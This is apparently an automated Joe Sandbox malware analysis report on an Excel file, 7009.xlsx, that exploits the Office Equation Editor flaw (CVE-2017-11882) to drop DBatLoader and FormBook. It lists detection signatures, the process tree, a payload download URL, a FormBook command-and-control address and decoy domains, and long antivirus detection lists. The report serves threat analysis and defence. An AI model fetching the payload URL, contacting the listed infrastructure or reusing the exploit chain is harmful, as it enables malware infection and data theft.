Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 7009.xlsx

Overview

General Information

Sample Name:7009.xlsx
Analysis ID:532894
MD5:8305dc6702f80d7ebe34cd8c63297561
SHA1:db055cce075213d510de5ca9044ea76036dbcd07
SHA256:9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

DBatLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected DBatLoader
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Yara signature match
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1124 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2676 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 488 cmdline: "C:\Users\Public\vbc.exe" MD5: 3A9AE96D1F6404FCCF5BD99B7C5C0383)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • Odhbljup.exe (PID: 1320 cmdline: "C:\Users\user\Odhbljup.exe" MD5: 3A9AE96D1F6404FCCF5BD99B7C5C0383)
        • Odhbljup.exe (PID: 2192 cmdline: "C:\Users\user\Odhbljup.exe" MD5: 3A9AE96D1F6404FCCF5BD99B7C5C0383)
        • NAPSTAT.EXE (PID: 1708 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
          • cmd.exe (PID: 2172 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.heidecide.xyz/hno0/"], "decoy": ["526854.rest", "loosesalatoyof2.xyz", "drillshear.com", "kdsh-uae.com", "firstnetinsurance.net", "28684dw.com", "hikinglifekr.com", "astramed-clinic.store", "24hxinh.com", "livebongdatv.net", "henrymaskph.com", "newlanlan.com", "txboilerparts.com", "thepurldistrict.com", "changemylifefast.info", "sapphirecloset.com", "ascensionmemberszoom.com", "huffmanworks.com", "techarcstudio.com", "terbulen.store", "naamgem.com", "pwrsearch.com", "al-solaiman.com", "eastrwanda.com", "ruihongco.com", "grandrecordto-gathertoday.info", "bleuexpress.com", "estate.xyz", "intlglobaldelivery.com", "zeneplaza.com", "citiesmalawi.properties", "pumpkincheshire.com", "sunflowerhub.com", "zhongzhenghuagong.com", "aquaticatt.com", "kspqs.com", "cpshapes.com", "fgiheating.com", "primasariutama.com", "hotel-arcosdelparque.com", "benjaminagencymarketing.com", "whiteleyop.xyz", "ahmty.net", "transaction-immo.com", "bungaauraprediction.com", "profumeriamedici.com", "olymporian.com", "uprgoad.com", "negotat.com", "xn--z4qv1cr56dk0k.group", "bestwlz.com", "strongu-miner.com", "presticgroup.com", "cutos2.com", "mintstationery.com", "annengfanglei.com", "carijualpt.com", "chinagxsy.com", "urzeczenie.com", "dianyingyouquanquan.xyz", "voucheraja.com", "sdtcbh.com", "hyslier.com", "siebenmorgenband.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\pujlbhdO.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x1cf4:$file: URL=
  • 0x1cd8:$url_explicit: [InternetShortcut]
0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x19a8:$file: URL=
  • 0x198c:$url_explicit: [InternetShortcut]
00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x1cf4:$file: URL=
    • 0x1cd8:$url_explicit: [InternetShortcut]
    0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x1cf4:$file: URL=
    • 0x1cd8:$url_explicit: [InternetShortcut]
    Click to see the 141 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    10.3.Odhbljup.exe.1d02094.286.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      7.3.Odhbljup.exe.1d6d598.277.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        7.3.Odhbljup.exe.1d82094.284.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          4.3.vbc.exe.31d598.276.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            4.3.vbc.exe.332094.286.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              Click to see the 19 entries

              Sigma Overview

              Exploits:

              barindex
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 13.250.31.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 488
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 488

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig==Avira URL Cloud: Label: malware
              Source: http://13.250.31.113/7009/binso.exeAvira URL Cloud: Label: malware
              Source: www.heidecide.xyz/hno0/Avira URL Cloud: Label: phishing
              Found malware configurationShow sources
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.heidecide.xyz/hno0/"], "decoy": ["526854.rest", "loosesalatoyof2.xyz", "drillshear.com", "kdsh-uae.com", "firstnetinsurance.net", "28684dw.com", "hikinglifekr.com", "astramed-clinic.store", "24hxinh.com", "livebongdatv.net", "henrymaskph.com", "newlanlan.com", "txboilerparts.com", "thepurldistrict.com", "changemylifefast.info", "sapphirecloset.com", "ascensionmemberszoom.com", "huffmanworks.com", "techarcstudio.com", "terbulen.store", "naamgem.com", "pwrsearch.com", "al-solaiman.com", "eastrwanda.com", "ruihongco.com", "grandrecordto-gathertoday.info", "bleuexpress.com", "estate.xyz", "intlglobaldelivery.com", "zeneplaza.com", "citiesmalawi.properties", "pumpkincheshire.com", "sunflowerhub.com", "zhongzhenghuagong.com", "aquaticatt.com", "kspqs.com", "cpshapes.com", "fgiheating.com", "primasariutama.com", "hotel-arcosdelparque.com", "benjaminagencymarketing.com", "whiteleyop.xyz", "ahmty.net", "transaction-immo.com", "bungaauraprediction.com", "profumeriamedici.com", "olymporian.com", "uprgoad.com", "negotat.com", "xn--z4qv1cr56dk0k.group", "bestwlz.com", "strongu-miner.com", "presticgroup.com", "cutos2.com", "mintstationery.com", "annengfanglei.com", "carijualpt.com", "chinagxsy.com", "urzeczenie.com", "dianyingyouquanquan.xyz", "voucheraja.com", "sdtcbh.com", "hyslier.com", "siebenmorgenband.com"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: 7009.xlsxVirustotal: Detection: 35%Perma Link
              Source: 7009.xlsxReversingLabs: Detection: 40%
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exeReversingLabs: Detection: 35%
              Source: C:\Users\user\Odhbljup.exeReversingLabs: Detection: 35%
              Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 35%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\Odhbljup.exeJoe Sandbox ML: detected
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exeJoe Sandbox ML: detected
              Source: 4.3.vbc.exe.315eec.144.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7e610.131.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfdb70.107.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7909c.165.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce50f4.106.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.33154c.246.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.310e80.52.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3152c8.112.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d710a4.42.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cebffc.148.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d1ac.249.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d79768.59.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.310c38.39.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318e6c.162.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf3014.139.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331ca4.264.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d598.276.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d4f0.273.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d70008.71.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf058c.74.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6459c.33.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cdcd68.0.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced598.275.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d64370.24.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cefb84.27.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d71894.9.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81dfc.272.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d64d5c.90.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31914c.181.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfe2fc.126.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81b18.61.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31cf84.239.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3292e0.46.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81f44.282.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cec8e4.217.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7e368.15.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfe610.133.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce0b08.34.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.30cd68.0.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7e610.133.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331c54.260.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cec008.207.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d792e0.43.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d4f4.268.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331ef4.277.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.319308.5.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318b08.37.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318d98.156.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d010fc.238.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7e2fc.126.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d60e80.53.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32d0a8.94.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d685dc.151.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31943c.205.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cec8e4.215.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cece70.235.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315494.130.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced594.281.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31932c.197.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d4f0.271.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32e0c8.115.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d68b08.36.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce0b08.35.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.321414.55.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3143b0.68.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d71894.11.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf9f90.13.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329c94.206.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7f438.209.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329f90.12.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced4f4.268.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d69308.5.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf4008.145.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7e2fc.123.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331dfc.272.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d74008.145.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.314008.64.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d594.279.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01f44.282.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31c008.209.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.321b2c.121.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315e30.138.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce8d98.157.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced4f0.273.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d4f4.267.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.324008.147.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81b78.257.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d598.275.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.324008.79.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01ef4.276.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6932c.191.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d7126c.100.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce943c.204.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d792e0.46.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf93d4.174.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced4f4.267.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31459c.33.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31943c.203.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01dfc.274.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d60eec.0.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4b88.80.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d68e6c.167.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d8058c.216.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfd0a8.92.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.315e2c.142.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6c3b0.212.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce9258.185.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d71b2c.122.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31c8e0.221.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce50cc.3.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d0154c.245.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d80008.214.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce943c.203.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6cd5c.233.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.32b840.150.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.332764.18.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4b88.82.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ced448.260.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d64d5c.88.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3210a4.44.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d65eec.146.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.331f44.281.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6cf84.239.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.329a74.199.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d0154c.246.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cec3b0.213.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.314b88.80.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d81dfc.274.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.310c38.38.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d80ed4.234.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf9768.59.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cec3b0.211.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce43b0.68.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d80008.213.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf1b2c.121.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce9f80.26.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4b84.85.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.324008.145.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4f28.98.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6cb84.227.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.31d594.279.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.3143b0.70.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.330ed4.233.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6cd5c.231.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf5be4.10.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01ca4.266.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.318e6c.161.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d6d1ac.248.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf8fb8.156.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d68fdc.173.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce932c.197.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 4.3.vbc.exe.321d44.129.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01ca4.265.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf3014.137.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d643b0.69.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cecb88.224.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d68e6c.161.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1d01b78.257.unpackAvira: Label: TR/Patched.Ren.Gen
